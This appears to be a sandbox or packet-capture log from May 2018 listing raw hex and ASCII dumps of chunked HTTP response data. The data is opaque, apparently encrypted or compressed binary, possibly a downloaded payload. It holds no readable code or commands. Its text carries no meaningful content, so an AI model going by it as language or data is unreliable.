2018-05-07 12:49:53 UTC80INData Raw: bc f6 47 32 e7 f8 63 31 34 63 ba 58 8f 06 6a 75 32 3b ea ed 35 34 37 b8 d6 2e 67 6e 34 3b 98 69 91 e8 21 cc 0b ab e0 f8 40 37 59 24 3f 9f 63 33 30 63 4d 66 e0 f0 6a cc 33 30 66 64 40 37 b4 f0 35 98 64 6e 37 34 42 37 e6 aa 66 bd fa 16 67 bb f0 35 9a 34 67 36 63 45 36 e2 f0 65 63 31 62 ee e3 8f 66 04 34 34 14 ea 45 1b e5 9c 37 14 36 34 11 7f e5 c2 38 22 64 38 4d 38 08 e7 13 20 e2 f8 30 60 39 65 88 37 e3 ac 33 36 66 64 df 32 b6 f0 31 30 64 66 5d 74 13 74 e5 63 64 63 13 a1 10 23 14 f4 4c 34 66 42 6f 1a f3 16 2f e4 aa 39 62 65 32 df 0d 0a 38 30 30 30 0d 0a 68 e5 fd 34 37 39 32 da 62 e7 fe 34 36 34 67 e8 a3 1b 45 6a 93 e8 1a f5 38 f3 5d f7 6c b5 85 63 39 65 33 d1 46 98 cc cb 36 ed 71 38 df 95 23 31 64 3f 6e 3b 98 69 69 e8 21 34 0b ab e0 f8 40 37 59 24 3f 9f 63
Data Ascii: G2c14cXju2;547.gn4;i!@7Y$?c30cMfj30fd@75dn74B7fg54g6cE6ec1bf44E7648"d8M8 0`9e736fd210df]ttcdc#L4fBo/9be28000h4792b464gEj8]lc9e3F6q8#1d?n;ii!4@7Y$?c
2018-05-07 12:49:53 UTC96INData Raw: 10 34 54 2e 66 79 64 61 60 78 29 5f 00 34 41 10 42 43 60 09 07 4f 46 76 7d 34 6a 78 28 6c 55 63 05 27 72 28 2d 0f 53 2f 7d 7e 32 2e 70 34 29 10 0b 28 27 46 70 15 13 0d 7b 27 3a 11 13 5b 43 3b 19 34 7f 02 20 00 29 7c 05 30 76 37 54 39 6a 36 19 67 58 4c 47 0e 14 0e 47 31 22 31 71 7f 7b 79 53 2f 20 6b 68 52 55 73 69 34 25 02 54 15 68 15 6a 4a 38 4e 5a 7a 27 5d 22 34 28 3e 77 71 79 0e 09 7b 3d 27 63 64 72 79 24 5a 64 38 38 62 69 10 1f 10 09 66 1a 15 48 15 07 47 12 5a 5b 41 62 65 33 34 34 33 79 7c 06 08 63 06 25 2b 7f 73 63 01 65 63 7e 1b 01 5a 04 7c 0e 71 0b 30 40 17 59 45 30 63 7e 2b 34 0d 5b 22 62 7e 22 25 73 7a 66 72 31 31 6b 5c 14 70 5e 06 51 5b 59 30 11 4a 5a 24 39 34 01 03 55 0e 27 65 08 27 76 26 3b 6f 2b 20 77 75 3c 64 34 34 57 7a 6e 4a 4f 5f 7f 02 1c
Data Ascii: 4T.fyda`x)_4ABC`OFv}4jx(lUc'r(-S/}~2.p4)('Fp{':[C;4 )|0v7T9j6gXLGG1"1q{yS/ khRUsi4%ThjJ8NZz']"4(>wqy{='cdry$Zd88bifHGZ[Abe3443y|c%+scec~Z|q0@YE0c~+4["b~"%szfr11k\p^Q[Y0JZ$94U'e'v&;o+ wu<d44WznJO_
2018-05-07 12:49:53 UTC112INData Raw: 55 34 5a 34 05 36 02 31 44 63 50 65 0c 39 0c 65 1d 34 46 64 7d 34 43 39 11 31 0d 66 44 34 16 34 08 63 0b 38 4b 62 10 38 19 34 5f 34 0f 36 08 31 55 63 55 65 1a 39 42 65 47 34 0e 64 51 34 17 39 43 31 01 66 44 34 43 34 09 63 10 38 18 62 0b 38 5f 34 13 34 05 36 02 31 5c 63 55 65 0a 39 0c 65 54 34 46 64 55 34 59 39 11 31 29 66 64 34 7f 34 29 63 49 38 5b 62 0b 38 54 34 43 34 0f 36 0f 31 55 63 5d 65 43 39 4a 65 1c 34 05 64 58 34 45 39 18 31 44 66 51 34 43 34 0b 63 07 38 4c 62 0d 38 56 34 5d 34 46 36 05 31 42 63 56 65 0e 39 42 65 52 34 46 64 5a 34 56 39 45 31 0d 0a 38 30 30 30 0d 0a 0d 66 41 34 53 34 45 63 07 38 57 62 0a 38 4a 34 47 34 14 36 16 31 53 63 4d 65 0c 39 10 65 13 34 09 64 46 34 17 39 57 31 16 66 58 34 5b 34 45 63 20 38 54 62 08 38 74 34 52 34 0f 36 0d
Data Ascii: U4Z461DcPe9e4Fd}4C91fD44c8Kb84_461UcUe9BeG4dQ49C1fD4C4c8b8_4461\cUe9eT4FdU4Y91)fd44)cI8[b8T4C461Uc]eC9Je4dX4E91DfQ4C4c8Lb8V4]4F61BcVe9BeR4FdZ4V9E18000fA4S4Ec8Wb8J4G461ScMe9e4dF49W1fX4[4Ec 8Tb8t4R46
2018-05-07 12:49:53 UTC128INData Raw: 62 cb 13 88 74 29 84 8a 39 3f 68 c6 10 25 20 94 79 50 ad 01 75 62 6c 4d 1d 0d 7e 20 ed b6 12 f0 31 16 38 24 d3 3b 83 26 53 2d 32 6f 44 36 57 39 41 50 64 8d 38 07 f6 55 35 61 11 39 78 32 a4 0d 1b 3b 47 39 16 37 3e d1 3e 03 3d 33 e8 0c 72 56 e3 34 14 47 5c 26 17 88 30 33 b2 e5 37 49 26 34 6a d4 a4 4c 3d e2 e7 f0 3d df 36 11 9d 66 09 d2 d0 63 c9 66 6f 51 73 50 31 66 53 74 30 27 37 07 81 04 e7 c0 97 54 36 34 2d 63 33 b3 45 6e 10 7d 71 40 33 0f e5 de 60 45 1f e0 d1 65 6f 4d 53 e6 db 09 12 7e 10 19 f4 d9 0e 44 28 87 0a 32 bd 74 aa a2 8d 28 6f 33 35 00 3d 30 d8 0d 44 37 34 ce 60 6b d2 73 4d 09 32 55 73 13 07 64 38 df 17 7c 01 38 d2 f7 3a dc 05 50 c5 42 62 39 98 2e aa c7 69 20 f4 b2 42 25 43 23 61 71 ba db 41 3e 16 6d b8 66 e0 a5 63 df 39 a8 35 ff 24 75 3f 20 de
Data Ascii: bt)9?h% yPublM~ 18$;&S-2oD6W9APd8U5a9x2;G97>>=3rV4G\&037I&4jL==6fcfoQsP1fSt0'7T64-c3En}q@3`EeoMS~D(2t(o35=0D74`ksM2Usd8|8:PBb9.i B%C#aqA>mfc95$u?
2018-05-07 12:49:53 UTC144INData Raw: 09 21 73 38 35 36 b9 19 40 63 02 9d 3a b8 73 fb 4c 15 ed 93 1f eb 17 a2 d0 91 3b 55 67 dc 88 a4 64 53 62 c8 0c 64 75 e8 26 84 2b cc 18 d5 e0 f9 16 9c 9b 2e d3 19 89 93 63 2b 37 35 25 30 32 c1 ba e8 f4 40 df ee 83 5c 65 63 37 98 12 b0 14 38 39 61 be 04 62 08 58 74 f0 66 a9 60 9b 12 66 bb 65 a4 61 e9 30 0f 67 d1 2b b9 fe 63 70 84 16 a8 60 50 ad ff 14 22 70 79 84 24 f5 34 46 09 ea 39 30 ea 71 61 ea 71 6e ec 7b 34 76 ed 7c 28 be 71 39 f2 44 99 41 24 de 1d 05 67 9b 4e 20 6e 8c 19 49 34 43 0a 3f bf 65 31 b9 25 3d ec 25 35 eb 23 b3 24 ef 22 28 bd 71 31 30 00 75 63 3d c4 de 0a 55 6a 0d 0a 38 30 30 30 0d 0a ef 66 3c e2 e9 6c 3a 35 b0 ce 99 b6 43 31 bb 25 2d 3c ea 6f 66 e8 73 4a 76 11 3d cb 00 8b 3a da 62 6d 27 8a 76 d5 41 95 9b c7 61 6a ef 6e 25 b4 31 bf 20 2e 3a
Data Ascii: !s856@c:sL;UgdSbdu&+.c+75%02@\ec789abXtf`fea0g+cp`P"py$4F90qaqn{4v|(q9DA$gN nI4C?e1%=%5#$"(q10uc=Uj8000f<l:5C1%-<ofsJv=:bm'vAajn%1 .:
2018-05-07 12:49:53 UTC160INData Raw: db 7a 00 06 ac 5e dd 5c b4 18 70 d6 2c b9 65 7e a4 6c 94 2d 3c 8a b0 18 62 64 be 77 62 66 6f d9 16 b3 3b 65 c0 60 3b 3a ba 26 e5 25 3b bf f4 d9 8d 67 0c a2 32 65 24 72 d5 62 e1 f8 61 3b 11 38 3d 5e 37 6c a5 60 0b fd 65 22 38 54 24 38 67 24 32 ec 27 65 28 61 70 38 37 70 65 86 76 35 31 73 64 61 a1 79 39 8a 25 39 cb 51 33 84 ad 04 66 9b 37 22 38 95 22 38 bf 22 32 37 27 65 2e c8 76 38 e5 71 65 e7 7d 6d b5 d4 e5 9b 3d bb f8 6a a7 69 59 56 32 76 28 05 b8 62 63 8b f3 0d 44 99 37 17 6f e7 8c ed ab 25 2b d1 5b 38 45 ca b0 48 76 01 5c 3b 54 46 38 77 5d 60 25 4a 39 bf 2e 76 6f ba 39 60 71 75 53 23 ab 25 b8 c5 8d 61 8a 7b 77 18 67 25 0c da 66 32 54 91 62 66 57 ce 18 24 8f 33 d1 35 52 8f 96 0d 63 c2 46 02 6a ee a4 d1 61 c7 c6 74 60 a3 dc a5 67 0a ba 73 61 66 b4 4c 06
Data Ascii: z^\p,e~l-<bdwbfo;e`;:&%;g2e$rba;8=^7l`e"8T$8g$2'e(ap87pev51sday9%9Q3f7"8"8"27'e.v8qe}m=jiYV2v(bcD7o%+[8EHv\;TF8w]`%J9.vo9`quS#%a{wg%f2TbfW$35RcFjat`gsafL
2018-05-07 12:49:53 UTC176INData Raw: d1 26 6a cb 99 6f 63 ba 7d 97 b1 61 6c 7e 59 65 cd 48 bc db cb 34 37 39 31 66 e9 e3 ee c9 c9 cb 0f 43 64 68 fe e7 bc 38 29 34 db 34 bc 25 63 31 03 b8 51 9b 60 39 5a 65 05 ca 99 9b 67 64 be 19 6c c9 ec fb ef 34 22 dc d8 62 64 00 b3 27 6c b3 b9 58 3b 34 66 36 e0 f5 28 e0 c1 64 63 4c 65 0d 13 67 27 64 df 34 3d ba c9 33 11 75 5f 74 bf 34 6e ee e1 39 14 32 8c ad 39 19 73 6d 3f bb 26 c1 60 67 28 0d 63 38 62 65 b3 dc 9e 80 cb 34 c8 ba f5 3d e1 a6 42 13 2e b9 20 9b 65 23 38 1a 34 50 51 35 33 0d 99 43 93 b8 4d 9b d1 71 59 dc 63 44 23 34 6b 9b 21 2c 37 09 70 31 ef 23 c3 bd 73 b4 b9 e8 21 c0 b1 27 84 38 73 35 0d 0a 38 30 30 30 0d 0a 33 1a ef 73 87 bc 75 8b 69 4d ee 7c 82 e5 32 ec e6 45 f8 cf 37 c6 ce b8 11 be df 32 0d 34 9a 9c e1 f8 4c 51 ef 4d 39 38 60 67 31 bb e5
Data Ascii: &joc}al~YeH4791fCdh8)44%c1Q`9Zegdl4"bd'lX;4f6(dcLeg'd4=3u_t4n929sm?&`g(c8be4=B. e#84PQ53CMqYcD#4k!,7p1#s!'8s580003suiM|2E724LQM98`g1
2018-05-07 12:49:53 UTC192INData Raw: 33 18 26 e4 37 34 30 3b 30 b0 57 66 37 6e 3c b6 3a 3b e4 33 b9 21 14 b8 3a 14 66 b4 68 be e3 32 11 e3 3a c5 e3 3a 51 30 b3 37 de e4 37 0d b7 3a e1 b1 67 5c 22 b4 35 dc e5 60 5b b8 3b 62 60 38 6d b4 73 b4 65 2e e3 32 62 e3 3a 55 ec b9 61 65 30 36 67 e7 1b 35 37 5e b1 37 73 e6 0a b8 b9 b7 6e 03 ea 2f 3a 62 01 55 b9 23 4b b4 6d b7 14 a1 be 6c ba d2 cb ec f6 6e f3 e4 63 6d 34 16 ef 3a 12 71 72 20 37 b4 1a b5 64 62 64 35 f8 66 8c d3 e9 31 f2 3f 9e e2 66 39 31 ee 7b 74 a8 28 08 7d e7 31 4e b0 31 0c e7 3c f0 2c 2c cb e3 31 6e e4 60 a2 4b 50 ec 67 1c ec 3c 6e bb e0 63 ae b3 34 f1 40 91 b1 66 81 37 b1 36 fc b2 61 ec e0 32 d1 e5 34 9c 3b e3 31 3e 35 8e af 3b f9 11 7a b0 3d 11 81 c7 36 5e c2 61 79 c0 61 d8 49 3b cd 67 cf 5b c0 63 1c c0 36 bf cd 33 a9 94 64 b4 d6 19
Data Ascii: 3&740;0Wf7n<:;3!:fh2::Q077:g\"5`[;b`8mse.2b:Uae06g57^7sn/:bU#Kmlncm4:qr 7dbd5f1?f91{t(}1N1<,,1n`KPg<nc4@f76a24;1>5;z=6^ayaI;g[c63d
2018-05-07 12:49:53 UTC208INData Raw: 0a ca b8 65 9e 05 b5 31 bb 94 f8 8a 67 f8 84 79 33 37 91 ef ca f5 d8 2b 12 31 9c ed 0b 89 6e a8 21 63 64 b3 e6 a3 8f 32 1a ec 00 64 5a ab 3b ab 73 60 3b 26 60 a1 c3 c5 32 ee a7 8f 26 97 36 a2 92 30 69 42 32 ad 95 35 41 66 f3 7c 38 a3 e4 d6 23 07 0f 81 3e a8 43 30 12 89 19 64 f6 61 ff 45 37 25 57 64 49 c8 bc 40 35 02 19 9a cf 07 63 c8 9a 6c 9b 37 1e 77 9b 37 d8 3b 33 65 6e 07 1e c9 bb 1a 35 25 50 44 9a 56 66 cc 66 74 d2 5a 2b 59 11 2e 44 79 17 6c 29 24 67 73 74 55 1a 42 70 07 19 0b 03 6c 59 06 47 01 bb 6b 4c 9d a2 bf 52 e6 f2 14 55 74 c3 cb 7a 35 b1 72 6b e3 d9 9d 76 4d 8c 7f 66 7c 48 64 20 34 38 70 45 3c 79 72 7c 75 bb a3 0d 0a 38 30 30 30 0d 0a 7c 7a 27 5e 71 ee 14 2b 22 7b 60 2b 63 a4 69 24 30 37 cf 09 34 70 99 7c 20 c7 0b 9d 57 08 5d 65 c3 49 64 72 97
Data Ascii: e1gy37+1n!cd2dZ;s`;&`2&60iB25Af|8#>C0daE7%WdI@5cl7w7;3en5%PDVfftZ+Y.Dyl)$gstUBplYGkLRUtz5rkvMf|Hd 48pE<yr|u8000|z'^q+"{`+ci$074p| W]eIdr
2018-05-07 12:49:53 UTC224INData Raw: b8 32 ef 21 3c dc df 19 4c 31 64 c7 c7 14 0e 0f a6 63 10 29 b5 2f 90 69 6e cb 73 41 6e 5c 73 ce e0 e3 3a 8e e3 3d e1 28 3b cb e7 19 54 57 37 39 f1 44 76 ed 4a c0 b7 24 a2 63 34 38 98 42 98 bb 44 74 cf 3e 10 80 9c 44 d0 41 d1 64 42 34 5c ec 4e c0 99 71 98 35 97 bb 08 6c 6c 13 11 bf 21 34 5e b0 12 18 b5 2d 6c 37 b9 83 42 c8 5d c6 16 3e d0 63 39 67 58 4c 9a 10 35 3b d0 64 05 bd 42 d1 b2 f0 74 2c 37 41 d5 b9 20 cb 8c 0f a0 42 64 38 69 dc b0 94 66 0f 3e 13 ec 23 2d 6a ed 41 22 27 b8 71 66 98 b9 79 e7 d1 54 39 64 66 37 bf c6 b9 2b 67 8c 3d a1 22 79 50 81 b5 09 b5 70 aa c9 35 19 fb 13 0d b3 59 60 45 25 dc ef 21 36 1c 20 51 dd 75 66 10 73 36 39 b1 67 75 24 32 c7 54 37 52 79 cb 17 21 d6 76 77 0a f3 63 5d 6a e7 6b 99 65 15 0d 79 66 51 d3 77 38 b2 31 a3 62 38 83 31
Data Ascii: 2!<L1dc)/insAn\s:=(;TW79DvJ$c48BDt>DAdB4\Nq5ll!4^-l7B]>c9gXL5;dBt,7A Bd8if>#-jA"'qfyT9df7+g="yPp5Y`E%!6 Qufs69gu$2T7Ry!vwc]jkeyfQw81b81
2018-05-07 12:49:53 UTC240INData Raw: 39 62 30 cf 99 23 8b 63 74 73 39 ee 56 c9 22 64 63 cb b0 25 b4 34 5d 39 66 59 e3 66 30 67 86 64 9a 76 ac 78 3d 22 e3 f1 78 e0 32 37 26 b7 8f 31 34 63 39 36 6b 6e 8a 47 f3 13 36 0e 30 6f 1f d1 39 fa 24 22 88 35 c2 b9 e0 63 64 c6 c7 9d 33 68 d1 37 2b 6f 65 36 a0 34 f0 33 53 65 8b 3b 19 05 43 b1 a6 1a 19 64 5d 59 34 6a 8c be fd d4 33 74 60 9f c5 7a 3d ba 3e 3b 39 b7 32 64 a6 36 72 f1 37 33 d1 da 23 3b e1 a1 2b 30 e5 da d5 1c 37 66 6a 45 7e 47 13 37 5c 34 0d 68 e4 37 c7 d4 06 2c 39 18 cc 21 f6 b6 70 71 b2 e8 3f 95 20 34 82 69 f7 cd 99 9b dc f8 ee ac 30 1e a6 4e 57 04 f2 24 45 7d ec 38 50 6b a4 63 c6 84 a7 52 61 32 e8 bf b1 67 b2 64 9c 69 12 24 76 35 0d 0a 38 30 30 30 0d 0a 0c 65 cb a4 bf 99 4b d9 76 6a 77 5e de 9d 43 6a 8c 79 e1 29 e1 32 b9 6a 6e f4 6a 68 a0
Data Ascii: 9b0#cts9V"dc%4]9fYf0gdvx="x27&14c96knG60o9$"5cd3h7+oe643Se;Cd]Y4j3t`z=>;92d6r73#;+07fjE~G7\4h7,9!pq? 4i0NW$E}8PkcRa2gdi$v58000eKvjw^Cjy)2jnjh
2018-05-07 12:49:53 UTC256INData Raw: 30 6d 3f a6 32 30 67 2d 61 30 68 ed c7 b9 70 b4 6d 33 ed 46 3c 8a c8 b8 38 34 00 ef 5f 6a 47 29 69 3a 29 10 76 b8 a4 84 31 5c ba d5 14 70 37 6f d9 a0 56 65 dc 3f 77 34 66 73 ef fe d0 cc 04 18 02 34 c8 40 7a 65 30 5b 32 30 2d 36 0b 89 31 25 a3 35 42 9b 21 22 cf 29 2f 91 05 8e 57 34 05 f4 3b 63 24 63 fa 6a 64 b5 78 3c 60 45 4e 56 48 b0 f1 72 3c 34 b0 78 51 81 f3 74 46 6c 62 bf 47 38 20 33 84 65 0f 20 bb b5 94 62 f4 38 b8 1c 15 3c e5 dc d2 24 6b d6 75 b1 32 3d 89 02 27 3b 50 69 75 36 6a 34 e4 67 37 44 11 d9 ca 74 b4 36 76 36 8c 67 7c ae 3a 7a a5 3d 88 e5 31 dc 0d cd 31 0c 12 66 29 44 05 39 31 ee 6e 38 69 d3 37 62 07 6e ba 48 60 f6 10 75 30 3b d2 71 21 c8 3f 17 6c ec 33 63 be 41 2e 3a 8b 67 23 65 bc 9a 62 10 27 9c 33 1d 65 3b d6 39 76 48 a0 1d 66 48 c7 75 13
Data Ascii: 0m?20g-a0hpm3F<84_jG)i:)v1\p7oVe?w4fs4@ze0[20-61%5B!")/W4;c$cjdx<`ENVHr<4xQtFlbG8 3e b8<$ku2=';Piu6j4g7Dt6v6g|:z=11f)D91n8i7bnH`u0;q!?l3cA.:g#eb'3e;9vHfHu
2018-05-07 12:49:54 UTC272INData Raw: 68 65 60 63 66 bd 1d 11 33 9c 81 65 62 39 62 65 08 cc 15 66 bf cc 13 b2 37 71 a4 c5 f5 34 7b f3 a4 23 84 3a 68 8a d0 fd b9 36 eb a9 24 33 1c 71 35 e3 7f 25 ca 64 e9 67 34 74 0c 64 67 dc 6d 82 31 fa 01 64 cb 35 fa b7 1b 43 64 4e 0b 62 ef 7e 1d bf 7e c8 ed 3a 63 b9 db 7a b2 64 50 eb 95 65 c4 bf 27 60 bd 71 cf b4 31 35 f7 ed 27 bd 67 30 ec 63 6c b3 75 9a e1 f1 4c d7 3b cb 23 ca e3 9f 0b 25 19 17 23 f4 9d 13 17 dc 81 84 00 6d 77 b0 6f 15 ed 18 17 14 3e c3 65 bb 7f f8 bb 82 9d 67 ba 38 f3 33 46 61 03 42 7e e8 69 69 6b bc b0 ee 53 63 6f 11 31 0f 37 78 29 44 59 30 bc 44 26 b4 e0 95 10 3b b1 34 68 5a 3a 30 47 32 66 34 ea 43 20 5a 78 75 77 67 17 63 73 36 ef 35 20 3a 0e 39 34 71 0d 0a 38 30 30 30 0d 0a 65 86 39 2c b5 54 69 43 64 bb 58 72 64 f8 4d cb 7b b4 7e f5 e8
Data Ascii: he`cf3eb9bef7q4{#:h6$3q5%dg4tdgm1d5CdNb~~:czdPe'`q15'g0cluL;#%#mwo>eg83FaB~iikSco17x)DY0D&;4hZ:0G2f4C Zxuwgcs65 :94q8000e9,TiCdXrdM{~
2018-05-07 12:49:54 UTC288INData Raw: 15 20 66 6c dc 0b c7 1a 20 13 74 7d 38 b1 a1 e4 43 50 bf 9a 7b 62 7a 2c 4d 3b 02 20 6f 46 25 33 69 33 16 75 88 3d eb 39 17 34 76 e7 48 10 27 39 45 6d 26 35 17 4e f0 dc 64 90 10 3b 61 66 11 7b 8b 30 bb 6a 79 de 91 e3 df 27 38 10 7c c8 61 ac 23 77 96 f1 17 25 33 09 27 f7 8c f7 87 2a bd cc 60 a2 6f 20 7a 66 a2 7e 26 34 db 26 be f6 70 68 69 d1 3c 10 75 b8 26 1b 17 e6 c2 69 5c 54 d7 61 d9 3d 7a 01 05 71 8c 14 e6 1e 74 3d 28 31 33 46 21 44 33 50 18 3e 43 5b 3f 3b d0 dd a2 0f 64 0f 11 35 86 7f 08 6d 6e b9 be 4c 68 0a 42 76 c6 33 f5 7a 6c 28 34 82 24 61 bb 41 b2 a4 5f 0e 6c b5 b9 d3 3b 79 09 3b f3 64 53 33 e6 de 41 33 5d 21 33 d8 08 26 36 64 34 41 60 db e6 3d a8 62 5f ff 36 b1 56 44 66 1d b3 2f 22 32 00 85 67 6e 00 34 46 64 c3 16 70 f9 a6 23 c9 68 24 62 5d f4 25
Data Ascii: fl t}8CP{bz,M; oF%3i3u=94vH'9Em&5Nd;af{0jy'8|a#w%3'*`o zf~&4&phi<u&i\Ta=zqt=(13F!D3P>C[?;d5mnLhBv3zl(4$aA_l;y;dS3A3]!3&6d4A`=b_6VDf/"2gn4Fdp#h$b]%
2018-05-07 12:49:54 UTC304INData Raw: 87 b7 df be 5e 37 39 79 30 b9 21 ee 2a b9 60 64 33 35 46 ef 25 67 bc 60 11 31 5f a5 61 63 bf 61 95 ea 64 65 cc eb 21 c0 45 37 ba 34 3b ce fa 63 60 09 39 9a 63 4c 6e ec 76 dc ef 31 d8 24 df 81 01 33 e4 0b 3b 34 bd 34 95 ea 11 d8 13 17 8c b3 39 ce ba 49 82 2d 1e dd db 63 3a ee 3e cd 59 18 d7 3b 62 eb 9a 34 52 45 38 0a 11 86 af 3b b5 97 e5 61 a5 40 b3 a1 24 29 39 63 65 bd 23 ee ea 64 ec 63 d1 c0 50 3b 62 ec 7e e4 6e e9 7c 35 76 18 71 35 ed 3b 37 e0 bd 6c 61 ea 31 f4 0b 66 b6 80 39 38 73 c3 15 16 23 31 0b ab 4d 3c 09 39 ef 20 33 c8 36 35 cb 41 c7 d1 de 33 f9 26 a3 69 ca b7 a1 73 e1 28 f8 eb 21 34 b9 74 f0 dc 78 35 21 06 71 60 11 9a 16 c1 9d 10 33 d8 99 11 dc 63 61 d1 46 30 64 4e 34 71 26 64 ee 60 0d 0a 38 30 30 30 0d 0a 67 38 7d b2 34 d0 9f 18 31 34 66 bd 20
Data Ascii: ^79y0!*`d35F%g`1_acade!E74;c`9cLnv1$3;449I-c:>Y;b4RE8;a@$)9ce#dcP;b~n|5vq5;7la1f98s#1M<9 365A3&is(!4tx5!q`3caF0dN4q&d`8000g8}414f
2018-05-07 12:49:54 UTC320INData Raw: 4b 78 5d 1a 60 41 b7 37 ba 71 3c ef b2 78 a6 35 61 8a 51 18 16 ef 68 a9 b0 b9 32 e5 66 05 9c b8 4d c3 b0 2d 65 61 51 63 80 31 ef 2c 64 bf 71 f1 65 ba e9 87 0a bd 77 d4 62 82 6b 1c 03 a5 04 08 bc 68 33 30 8d 6b 68 f2 32 d2 29 ee f1 a7 16 6e 00 f4 66 e4 4a 67 36 4c 29 66 8f 64 3d 90 36 39 0f 62 e9 7d 98 12 34 d0 55 a7 83 1d 76 62 72 3f 0b ab 74 c5 ea 1b 66 12 22 e0 63 36 77 14 be 78 6d da 6d 55 32 bd 4e 3c 39 e8 e9 79 3e e8 65 04 b9 34 40 3f 69 80 a3 b8 75 f7 38 d5 1f d2 69 e8 4e a0 8e c2 37 24 48 19 30 b0 19 f2 34 b4 37 37 55 fd a4 39 a4 14 6e 50 b2 c1 16 d4 43 f9 33 3c bb ee 98 6a 08 f0 62 60 b0 f5 65 5f 79 a0 be db bc 10 f1 18 3e bf 93 34 74 4f d5 34 38 17 36 01 74 94 4e 79 ed b4 f6 20 3e 05 b0 20 e3 b0 70 4d e3 3b d0 36 2b c4 03 e0 e2 97 37 4f 7f dc 87
Data Ascii: Kx]`A7q<x5aQh2fM-eaQc1,dqewbkh30kh2)nfJg6L)fd=69b}4Uvbr?tf"c6wxmmU2N<9y>e4@?iu8iN7$H0477U9nPC3<jb`e_y>4tO486tNy > pM;6+7O
2018-05-07 12:49:54 UTC336INData Raw: bf a6 e7 a4 66 bf d4 b0 38 8a f0 c5 63 59 e9 af db ed d7 74 15 b4 05 ba 35 8e a0 66 3e 34 bf 71 91 1d 64 70 d3 61 ef 6d d5 cb 46 24 92 bd e4 fd 00 62 b2 28 9f 39 e9 51 bb 66 99 12 30 dc 27 33 a7 30 64 07 26 f4 43 38 65 e8 22 3c b3 2f 90 b8 05 b4 32 34 12 26 9c 74 cc a3 13 61 58 be 73 61 4f f0 8d 6c 52 6c bc 7f 2d 00 6a 21 36 6b ea 3b e8 67 eb f0 a9 67 65 b5 69 cb 0a 36 f1 54 60 2e bd 27 39 6f ee 3f d5 64 34 b4 78 b4 cb 41 cf f8 b1 d3 66 ef 36 dc dd 97 54 05 e8 b1 3e 52 6b 69 a9 41 26 bf 04 30 e7 ba bf f2 3b ec 7f b8 9d 87 33 34 38 e7 4b 74 37 4c 28 ba 65 24 38 bf 7b cc 5e 22 08 46 38 69 0c 2c f7 70 33 dc e2 63 63 3f 69 73 53 33 33 a0 6e 45 66 4c 64 02 a5 6e 17 6a ba 6d 40 6a 37 41 6f cb 13 6b 37 d0 d9 e3 c4 18 c6 42 0d 0a 38 30 30 30 0d 0a 3f 67 8e ee e3
Data Ascii: f8cYt5f>4qdpamF$b(9Qf0'30d&C8e"</24&taXsaOlRl-j!6k;ggei6T`.'9o?d4xAf6T>RkiA&0;348Kt7L(e$8{^"F8i,p3cc?isS33nEfLdnjm@j7Aok7B8000?g
2018-05-07 12:49:54 UTC352INData Raw: b0 f6 72 8c 36 60 b7 02 5b 31 34 ed f5 dc 34 c3 e5 7f ef c8 bd 94 3d 61 39 40 76 bf 28 26 e8 70 20 67 02 a3 e3 c0 24 45 ba 75 76 60 df 14 77 7d 2d ba 2c 46 0c 94 f8 40 63 e8 a5 b8 24 91 64 3c 39 3f 0a 44 46 43 65 ba 7e 63 19 ec 2b 19 9d 13 2f 67 66 8c 2f 6d c9 c6 67 62 8c 60 23 b4 37 34 5a e2 2f 34 38 60 34 38 39 6b 6d f7 5c 26 e3 2e c8 63 02 1e 67 b0 1f 99 4e 1a 62 ef c3 35 51 7a 39 32 a2 ed 33 74 3a b4 77 64 34 d0 76 4c 64 38 39 6d b6 cb 69 b9 aa 29 30 63 39 65 04 38 5c a3 23 0f 66 27 30 48 e0 b8 52 3d 9b 64 ca 34 56 f7 8d 68 b5 38 38 32 0e 3a 66 0d b2 25 9e 76 71 4f 20 31 53 45 3b 79 e5 ec 76 c4 66 ef 77 3c bc 74 c1 bc 50 66 36 b7 48 30 65 16 6b c7 38 54 37 d0 b2 6c cd cb e5 36 45 31 69 3a d2 79 e8 74 62 99 0a 79 9e 19 39 bf 7a 39 c5 bc 58 67 92 91 93
Data Ascii: r6`[144=a9@v(&p g$Euv`w}-,F@c$d<9?DFCe~c+/gf/mgb`#74Z/48`489km\&.cgNb5Qz923t:wd4vLd89mi)0c9e8\#f'0HR=d4Vh882:f%vqO 1SE;yvfw<tPf6H0ek8T7l6E1i:ytby9z9Xg
2018-05-07 12:49:54 UTC368INData Raw: 31 74 b3 cd a6 44 63 3c db 62 79 ef 6b b9 83 e5 f3 b4 9f e4 40 c1 74 e8 13 f1 81 e3 ec 3b b8 13 45 61 24 25 a8 a1 fd 52 3c 04 00 7d 6f 33 24 2d a3 97 09 60 52 79 e6 7a be 38 f8 25 05 31 be 75 15 29 ef f6 47 c4 37 94 62 ea 60 a6 b2 72 24 b8 3b ce f7 31 76 b6 81 f1 b0 99 38 a5 66 b3 b2 4f 27 aa ee 70 5e 3f 75 3f eb 70 62 a4 e7 36 67 2a 65 6a a4 66 90 63 94 34 1d 40 79 df e6 77 50 ce b5 b8 47 27 63 21 c2 7d 3c 82 62 63 04 2c 27 a9 30 b1 44 19 23 64 c9 00 db 13 78 28 24 8a eb 3d 7d 17 47 31 21 36 58 ca 4c b6 02 9e 1e 2a 67 85 31 14 26 47 20 1d 73 1d 21 31 e7 1a 13 24 36 4b dd 95 24 7c 1c 46 66 4c 6a e6 33 4a e8 7a 31 34 51 7e 60 60 47 46 79 65 2e 36 76 f5 31 1f ff 3a 7d 15 78 ce 66 dc 04 ff 60 ad a4 3d 28 a2 61 1a 29 54 1a 10 e3 f6 f3 39 20 1c 0d 0a 38 30 30
Data Ascii: 1tDc<byk@t;Ea$%R<}o3$-`Ryz8%1u)G7b`r$;1v8fO'p^?u?pb6g*ejfc4@ywPG'c!}<bc,'0D#dx($=}G1!6XL*g1&G s!1$6K$|FfLj3Jz14Q~``GFye.6v1:}xf`=(a)T9 800
